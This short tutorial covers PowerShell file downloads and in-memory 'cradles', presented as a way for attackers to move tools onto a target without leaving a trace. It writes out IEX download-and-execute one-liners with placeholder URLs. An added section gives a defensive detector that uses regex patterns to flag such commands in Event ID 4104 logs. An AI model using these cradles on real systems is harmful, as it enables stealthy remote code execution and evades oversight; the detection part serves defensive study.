Hackers don't use Dropbox or Google Drive to transfer files to their target; in fact, they avoid these services on their expeditions altogether. A hacker may not even download the file to a directory, but instead load it directly into memory, where it is then used. This is called a fileless attack. Fileless attacks typically don't leave a trace, since the file is never saved to disk and only runs in memory.
Downloading Files Using PowerShell
Note: (C:\Users\Public\Downloads\<file name>) is the path where I want to save the file.
> (New-Object Net.WebClient).DownloadFile('https://[file_URL]', 'C:\Users\Public\Downloads\[file_name]')
Invoke-WebRequest
On PowerShell 3.0 or newer, you can use Invoke-WebRequest to download files. You can also use its alias, iwr.
Invoke-WebRequest 'https://[file_URL]' -OutFile 'C:\Users\Public\Downloads\[file_name]'
iwr "https://[file_URL]" -OutFile 'C:\Users\Public\Downloads\[file_name]'
Getting a Browser Error
If you get a browser error when trying to download a file using the command above, add the -UseBasicParsing flag.
iwr "https://[file_URL]" -OutFile 'C:\Users\Public\Downloads\[file_name]' -UseBasicParsing
Cradles
On Windows, cradles let you use PowerShell to download files and run them in memory. The secret sauce here is Invoke-Expression (IEX), which runs the downloaded script text in memory instead of writing a file to disk. This is great for transferring scripts to a target since it doesn't leave much of a trace.
> IEX (New-Object Net.WebClient).DownloadString('https://[script_URL]')
Invoke-WebRequest Cradle
IEX(iwr 'http://[script_URL]')
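The cradles above run entirely through the PowerShell engine, so with script block logging enabled their text is recorded in Event ID 4104 even though nothing is written to disk. The following added example (not from the original post) classifies such script text as a disk download or an in-memory cradle; the sample commands, the files.example host and the function name Get-TransferFinding are constructed for illustration.

```powershell
# Added example. $samples is constructed data standing in for the ScriptBlockText
# field of Event ID 4104 records; files.example is a placeholder host.
$samples = @(
    "(New-Object Net.WebClient).DownloadFile('https://files.example/a.zip', 'C:\Users\Public\Downloads\a.zip')",
    "iwr 'https://files.example/a.zip' -OutFile 'C:\Users\Public\Downloads\a.zip' -UseBasicParsing",
    "IEX (New-Object Net.WebClient).DownloadString('https://files.example/s.ps1')",
    "IEX(iwr 'http://files.example/s.ps1')",
    "Get-ChildItem C:\Users\Public\Downloads"
)

# -match is case-insensitive by default, like PowerShell itself.
$exec  = '\b(IEX|Invoke-Expression)\b'                 # evaluates a string as code
$fetch = '\b(DownloadString|Invoke-WebRequest|iwr)\b'  # returns content to the caller
$save  = '\bDownloadFile\b|-OutFile\b'                 # writes the content to disk
$url   = 'https?://[^\s''")]+'

function Get-TransferFinding {
    param([Parameter(Mandatory)][string]$ScriptText)

    if (($ScriptText -match $exec) -and ($ScriptText -match $fetch)) {
        $finding = 'in-memory cradle'   # fetched text is executed, never saved
    } elseif ($ScriptText -match $save) {
        $finding = 'download to disk'
    } else {
        return                          # nothing transfer-related in this script text
    }

    [pscustomobject]@{
        Finding = $finding
        Urls    = ([regex]::Matches($ScriptText, $url) | ForEach-Object Value) -join ', '
        Script  = $ScriptText
    }
}

# Four of the five constructed samples produce a finding; Get-ChildItem does not.
$samples | ForEach-Object { Get-TransferFinding -ScriptText $_ } | Format-List

# Against a live log (requires script block logging; Properties[2] is ScriptBlockText):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Get-TransferFinding -ScriptText $_.Properties[2].Value }
```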